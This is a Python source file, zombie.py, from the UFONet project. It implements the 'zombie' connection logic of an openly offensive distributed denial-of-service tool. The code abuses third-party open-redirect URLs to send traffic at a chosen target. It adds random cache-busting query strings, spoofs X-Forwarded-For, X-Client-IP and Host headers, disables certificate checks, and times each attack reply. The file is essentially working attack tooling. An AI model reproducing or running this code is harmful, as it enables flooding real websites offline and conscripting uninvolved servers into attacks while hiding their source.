zombie.py 10 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211
  1. #!/usr/bin/env python3
  2. # -*- coding: utf-8 -*-"
  3. """
  4. This file is part of the UFONet project, https://ufonet.03c8.net
  5. Copyright (c) 2013/2020 | psy <epsylon@riseup.net>
  6. You should have received a copy of the GNU General Public License along
  7. with UFONet; if not, write to the Free Software Foundation, Inc., 51
  8. Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
  9. """
  10. import io, hashlib, re, sys
  11. import time, threading, random
  12. from .randomip import RandomIP
  13. try:
  14. import pycurl
  15. except:
  16. print("\nError importing: pycurl lib. \n\n To install it on Debian based systems:\n\n $ 'sudo apt-get install python3-pycurl'\n")
  17. sys.exit(2)
  18. class Zombie: # class representing a zombie
  19. # constructor: function to construct a zombie
  20. # ufo: UFONet object, some state variables are recovered as well
  21. # zombie: name/url of zombie
  22. def __init__(self, ufo, zombie):
  23. self.ufo = ufo
  24. self.payload=ufo.payload
  25. self.attack_mode=ufo.attack_mode
  26. self.zombie = zombie
  27. self.connection_failed=True
  28. # wait for semaphore to be ready, add to herd, connect & suicide!
  29. def connect(self):
  30. reply=None
  31. with self.ufo.sem:
  32. self.ufo.herd.new_zombie(self.zombie)
  33. reply=self.do_connect()
  34. self.ufo.herd.kill_zombie(self.zombie, reply, self.connection_failed)
  35. return reply
  36. # handles zombie connection
  37. def do_connect(self):
  38. # connect zombies and manage different options: HEAD, GET, POST,
  39. # user-Agent, referer, timeout, retries, threads, delay..
  40. options = self.ufo.options
  41. c = pycurl.Curl()
  42. if self.ufo.head == True:
  43. c.setopt(pycurl.URL, self.zombie) # set 'self.zombie' target
  44. c.setopt(pycurl.NOBODY, 1) # use HEAD
  45. if self.payload == True:
  46. payload = self.zombie + "https://www.whitehouse.gov" #Open Redirect payload [requested by all UFONet motherships ;-)]
  47. c.setopt(pycurl.URL, payload) # set 'self.zombie' payload
  48. c.setopt(pycurl.NOBODY, 0) # use GET
  49. if self.ufo.external == True:
  50. external_service = "https://downforeveryoneorjustme.com/" # external check
  51. if options.target.startswith('https://'): # fixing url prefix
  52. options.target = options.target.replace('https://','')
  53. if options.target.startswith('http://'): # fixing url prefix
  54. options.target = options.target.replace('http://','')
  55. external = external_service + options.target
  56. c.setopt(pycurl.URL, external) # external HEAD check before to attack
  57. c.setopt(pycurl.NOBODY, 0) # use GET
  58. if self.attack_mode == True:
  59. if options.place: # use self.zombie's vector to connect to a target's place and add a random query to evade cache
  60. random_name_hash = random.randint(1, 100000000)
  61. random_hash = random.randint(1, 100000000)
  62. if options.place.endswith("/"):
  63. options.place = re.sub('/$', '', options.place)
  64. if options.place.startswith("/"):
  65. if "?" in options.place:
  66. url_attack = self.zombie + options.target + options.place + "&" + str(random_name_hash) + "=" + str(random_hash)
  67. else:
  68. url_attack = self.zombie + options.target + options.place + "?" + str(random_name_hash) + "=" + str(random_hash)
  69. else:
  70. if "?" in options.place:
  71. url_attack = self.zombie + options.target + "/" + options.place + "&" + str(random_name_hash) + "=" + str(random_hash)
  72. else:
  73. url_attack = self.zombie + options.target + "/" + options.place + "?" + str(random_name_hash) + "=" + str(random_hash)
  74. else:
  75. url_attack = self.zombie + options.target # Use self.zombie vector to connect to original target url
  76. if self.ufo.options.verbose:
  77. print("[Info] [Zombies] Payload:", url_attack)
  78. c.setopt(pycurl.URL, url_attack) # GET connection on target site
  79. c.setopt(pycurl.NOBODY, 0) # use GET
  80. # set fake headers (important: no-cache)
  81. fakeheaders = ['Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg',
  82. 'Connection: Keep-Alive',
  83. 'Content-type: application/x-www-form-urlencoded; charset=UTF-8',
  84. 'Cache-control: no-cache',
  85. 'Pragma: no-cache',
  86. 'Pragma-directive: no-cache',
  87. 'Cache-directive: no-cache',
  88. 'Expires: 0']
  89. c.setopt(pycurl.FOLLOWLOCATION, 1) # set follow redirects
  90. c.setopt(pycurl.MAXREDIRS, 10) # set max redirects
  91. c.setopt(pycurl.SSL_VERIFYHOST, 0) # don't verify host
  92. c.setopt(pycurl.SSL_VERIFYPEER, 0) # don't verify peer
  93. # c.setopt(pycurl.SSLVERSION, pycurl.SSLVERSION_SSLv3) # sslv3
  94. c.setopt(pycurl.COOKIEFILE, '/dev/null') # black magic
  95. c.setopt(pycurl.COOKIEJAR, '/dev/null') # black magic
  96. c.setopt(pycurl.FRESH_CONNECT, 1) # important: no cache!
  97. c.setopt(pycurl.NOSIGNAL, 1) # pass 'long' to stack to fix libcurl bug
  98. c.setopt(pycurl.ENCODING, "") # use all available encodings (black magic)
  99. if options.xforw: # set x-forwarded-for
  100. generate_random_xforw = RandomIP()
  101. xforwip = generate_random_xforw._generateip('')
  102. xforwfakevalue = ['X-Forwarded-For: ' + str(xforwip)]
  103. fakeheaders = fakeheaders + xforwfakevalue
  104. if options.xclient: # set x-client-ip
  105. generate_random_xclient = RandomIP()
  106. xclientip = generate_random_xclient._generateip('')
  107. xclientfakevalue = ['X-Client-IP: ' + str(xclientip)]
  108. fakeheaders = fakeheaders + xclientfakevalue
  109. if options.host: # set http host header
  110. host_fakevalue = ['Host: ' + str(options.host)]
  111. fakeheaders = fakeheaders + host_fakevalue
  112. c.setopt(pycurl.HTTPHEADER, fakeheaders) # set fake headers
  113. b = io.BytesIO()
  114. c.setopt(pycurl.HEADERFUNCTION, b.write)
  115. h = io.BytesIO()
  116. c.setopt(pycurl.WRITEFUNCTION, h.write)
  117. if options.agent: # set user-agent
  118. c.setopt(pycurl.USERAGENT, options.agent)
  119. else:
  120. c.setopt(pycurl.USERAGENT, self.ufo.user_agent)
  121. if options.referer: # set referer
  122. c.setopt(pycurl.REFERER, options.referer)
  123. else:
  124. c.setopt(pycurl.REFERER, self.ufo.referer)
  125. if options.proxy: # set proxy
  126. proxy = options.proxy
  127. sep = ":"
  128. proxy_ip = proxy.rsplit(sep, 1)[0]
  129. if proxy_ip.startswith('http://'):
  130. proxy_ip = proxy_ip.replace('http://', '')
  131. elif proxy_ip.startswith('https://'):
  132. proxy_ip = proxy_ip.replace('https://', '')
  133. proxy_port = proxy.rsplit(sep, 1)[1]
  134. if proxy_ip == '127.0.0.1': # working by using 'localhost' as http proxy (ex: privoxy)
  135. proxy_ip = 'localhost'
  136. c.setopt(pycurl.PROXY, proxy_ip)
  137. c.setopt(pycurl.PROXYPORT, int(proxy_port))
  138. else:
  139. c.setopt(pycurl.PROXY, '')
  140. c.setopt(pycurl.PROXYPORT, pycurl.PROXYPORT)
  141. if options.timeout: # set timeout
  142. c.setopt(pycurl.TIMEOUT, options.timeout)
  143. c.setopt(pycurl.CONNECTTIMEOUT, options.timeout)
  144. else:
  145. c.setopt(pycurl.TIMEOUT, 5) # low value trying to control OS/python overflow when too many threads are open
  146. c.setopt(pycurl.CONNECTTIMEOUT, 5)
  147. if options.delay: # set delay
  148. self.ufo.delay = options.delay
  149. else:
  150. self.ufo.delay = 0 # default delay
  151. if options.retries: # set retries
  152. self.ufo.retries = options.retries
  153. else:
  154. self.ufo.retries = 0 # default retries
  155. try: # try to connect
  156. c.perform()
  157. time.sleep(self.ufo.delay)
  158. self.connection_failed = False
  159. except Exception as e: # try retries
  160. for count in range(0, self.ufo.retries):
  161. time.sleep(self.ufo.delay)
  162. try:
  163. c.perform()
  164. self.connection_failed = False
  165. except:
  166. self.connection_failed = True
  167. if self.ufo.head == True: # HEAD reply
  168. code_reply = c.getinfo(pycurl.HTTP_CODE)
  169. reply = b.getvalue().decode('utf-8')
  170. if reply:
  171. if options.verbose:
  172. print("[Info] [AI] HEAD Reply:")
  173. print("\n"+ reply)
  174. if self.ufo.options.testrpc:
  175. return reply
  176. else:
  177. return code_reply
  178. if self.ufo.external == True: # External reply
  179. external_reply = h.getvalue().decode('utf-8')
  180. if external_reply:
  181. if options.verbose:
  182. print("[Info] [AI] EXTERNAL Reply:")
  183. print("\n"+ external_reply)
  184. return external_reply
  185. if self.payload == True: # Payloads reply
  186. payload_reply = h.getvalue().decode('utf-8')
  187. if payload_reply:
  188. if options.verbose:
  189. print("[Info] [AI] PAYLOAD Reply:")
  190. print("\n"+ payload_reply)
  191. return payload_reply
  192. if self.attack_mode == True: # Attack mode reply
  193. attack_reply = h.getvalue().decode('utf-8')
  194. reply_code = c.getinfo(c.RESPONSE_CODE)
  195. if options.verbose:
  196. print("[Info] [AI] [Zombies] "+self.zombie+" -> REPLY (HTTP Code: "+ str(reply_code)+" | Time: "+str(c.getinfo(c.TOTAL_TIME))+" | Size: " + str(len(attack_reply))+")")
  197. time.sleep(5) # managing screen (multi-threading flow time compensation)
  198. if len(attack_reply) == 0:
  199. print("[Info] [Zombies] " + self.zombie + " -> FAILED (cannot connect!)")
  200. if not self.ufo.options.disablepurge: # when purge mode discard failed zombie
  201. self.ufo.discardzombies.append(self.zombie)
  202. self.ufo.num_discard_zombies = self.ufo.num_discard_zombies + 1
  203. return [c.getinfo(c.RESPONSE_CODE),
  204. c.getinfo(c.TOTAL_TIME),
  205. len(attack_reply)]